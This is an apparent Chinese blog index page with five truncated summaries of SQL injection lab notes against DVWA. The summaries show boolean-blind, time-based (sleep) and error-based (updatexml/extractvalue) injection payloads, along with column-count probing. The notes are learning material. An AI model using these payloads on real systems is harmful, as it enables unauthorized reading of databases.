摘要:
select user,sleep(3) from dvwa.users; 因为有5行数据,所以会延时15秒。 select user from dvwa.users where user_id=1 and sleep(3); Windows 2003的安全日志: 开始 管理工具 事件查看器 双击即 阅读全文
posted @ 2020-04-27 20:58
强霸卓奇霸
阅读(388)
评论(0)
推荐(0)
摘要:
在DVWA的SQL盲注模块中: 判断当前数据库长度为4。 id=1' and length(database())>3 -- 执行成功 id=1' and length(database())>4 -- 执行失败 采用二分法逐步猜解数据库名为dvwa。 id=1' and ascii(mid(dat 阅读全文
posted @ 2020-04-27 19:37
强霸卓奇霸
阅读(248)
评论(0)
推荐(0)
摘要:
在dvwaSQL注入模块中 判断出为字符型注入。 id=1' and 1=1 -- 执行成功 id=1' and 1=2 -- 执行失败 使用order by判断列数为2。 id=1' order by 2 -- 执行成功 id=1' order by 3 -- 执行失败 使用union selec 阅读全文
posted @ 2020-04-27 18:51
强霸卓奇霸
阅读(405)
评论(0)
推荐(0)
摘要:
xpath处理函数报错注入: updatexml(xml_doc,xpath,new_value) 利用xpath把xml文档中的指定字符串替换成新值。 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); extractvalue(xml_ 阅读全文
posted @ 2020-04-27 18:15
强霸卓奇霸
阅读(323)
评论(0)
推荐(0)
摘要:
count(*) 对 行 数目进行计数。 select count(*) from dvwa.users; substring('要截断的字符串',开始截取位置,截取长度) substr('要截断的字符串',开始截取位置,截取长度) select substring('administrators' 阅读全文
posted @ 2020-04-27 17:27
强霸卓奇霸
阅读(77)
评论(0)
推荐(0)
浙公网安备 33010602011771号